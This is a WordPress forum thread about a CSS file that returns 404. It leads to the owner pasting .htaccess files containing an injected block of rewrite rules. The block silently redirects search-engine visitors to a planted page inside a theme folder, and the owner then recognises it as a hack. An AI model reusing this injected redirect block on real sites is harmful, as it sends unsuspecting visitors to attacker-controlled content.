CSS got hacked

I’m not so sure you got hacked… I should be able to download your css file and look at it, but I can’t. Maybe it’s missing?

The files all are NOT there – regardless what you think!
https://www.meexia.com/bookie/wp-content/themes/forever-autumn-10/style.css
Not found. Take it from there…

Well yea that’s the problem. The file is there when I check it with ftp! With the right permission too (644), all folders with the right permission. Basically all my files are intact. But you can’t access it.

I meant you can’t access them from browsers (like what you tried). I checked that all files have sensible size too (no 0 size).

Basically all my files are intact. But you can’t access it.

Well, that’s not a hack, that is a server problem. You need to talk to your hosting service.

Well, I just don’t get how it worked one day and not the next day. It also works for a few of my wordpress sites and not for a couple of them (which I suspected got hacked) –> all hosted on the same server. Anybody can think of anything else?

Meanwhile I’ll try to talk with my hosting service. But I doubt that this is the problem, because it DOES work with my other wordpress blogs (I have multiple wordpress installations on the server).

Note that initial installation worked fine. Then it got messed up the next day. Why would my host alter any files or the setting of ONE subfolder? (and without telling me) I have wordpress blogs on other folders and they’re all fine. And I’m using godaddy btw, so it should be quite reliable.

If the file is there and has correct permissions, but you cannot access it through a web browser, then it’s some kind of problem with your server. It’s as simple as that. This has nothing to do with WordPress at all. You say the file exists, but the server returns a 404 error for it. That doesn’t go through WordPress at all, that’s a simple “get a file through a webserver” thing.

Now, I use GoDaddy too, and they are everything *except* reliable in my experience. But, I have no idea why it doesn’t work for your case. I also have no idea why it would work one day and not the next. But I’ll lay it out quite clearly:

The CSS file should exist here:
https://www.meexia.com/bookie/wp-content/themes/forever-autumn-10/style.css

But it does not. That’s the problem. It’s a simple as that. Figure out why that link doesn’t pull up the CSS file, and the problem will be fixed.

BTW, what is the content of your .htaccess file in the bookie directory? Same goes for the main web root directory, what’s the .htaccess there? Perhaps you have something there that you should not have.

This is the content of my .htaccess in main directory:
# a0b4df006e02184c60dbf503e71c87ad
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^https://([a-z0-9_\-]+\.)*(google|msn|yahoo|live|ask|dogpile|mywebsearch|yandex|rambler|aport|mail|gogo|poisk|alltheweb|fireball|freenet|abacho|wanadoo|free|club-internet|aliceadsl|alice|skynet|terra|ya|orange|clix|terravista|gratis-ting|suomi24)\. [NC]
RewriteCond %{HTTP_REFERER} [?&](q|query|qs|searchfor|search_for|w|p|r|key|keywords|search_string|search_word|buscar|text|words|su|qt|rdata)\=
RewriteCond %{HTTP_REFERER} \=[^&]+(%3A|%22)
RewriteCond %{TIME_SEC} <59
RewriteRule ^.*$ /blog/wp-content/themes/squares/orelura/ex3/t.htm [L]
# a995d2cc661fa72452472e9554b5520c

This is the content of my .htaccess in bookie directory:

# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /bookie/
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
# a0b4df006e02184c60dbf503e71c87ad
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^https://([a-z0-9_\-]+\.)*(google|msn|yahoo|live|ask|dogpile|mywebsearch|yandex|rambler|aport|mail|gogo|poisk|alltheweb|fireball|freenet|abacho|wanadoo|free|club-internet|aliceadsl|alice|skynet|terra|ya|orange|clix|terravista|gratis-ting|suomi24)\. [NC]
RewriteCond %{HTTP_REFERER} [?&](q|query|qs|searchfor|search_for|w|p|r|key|keywords|search_string|search_word|buscar|text|words|su|qt|rdata)\=
RewriteCond %{HTTP_REFERER} \=[^&]+(%3A|%22)
RewriteCond %{TIME_SEC} <59
RewriteRule ^.*$ /blog/wp-content/themes/squares/orelura/ex3/t.htm [L]
# a995d2cc661fa72452472e9554b5520c

RewriteRule . /bookie/index.php [L]
</IfModule>

# END WordPress

Okay I just saw that this line looks very suspicious:
RewriteRule ^.*$ /blog/wp-content/themes/squares/orelura/ex3/t.htm [L]

Many months ago I got a few emails from various people saying that my server has been compromised and that it hosted some files attacking other people’s servers. I’ve deleted the folder and looks like it contains new files now (they’re different than the last ones). So I just deleted that folder again, and then delete the .htaccess file on /blog/ directory (cos the content looked suspicious too). I wonder if that’s enough. I think it’s possible that there was some harmful file inside a wordpress theme that I put in.

nevermind… I edited my comment. Godaddy, btw, STILL doesn’t offer the latest version of WordPress… and I was the one that got them to go from 2.1.2 to 2.3.2 (trying to get them to stay up-to-date)…

anyway, good luck with your issues… I got hacked once and I’ve been much more diligent about keeping WordPress up-to-date since.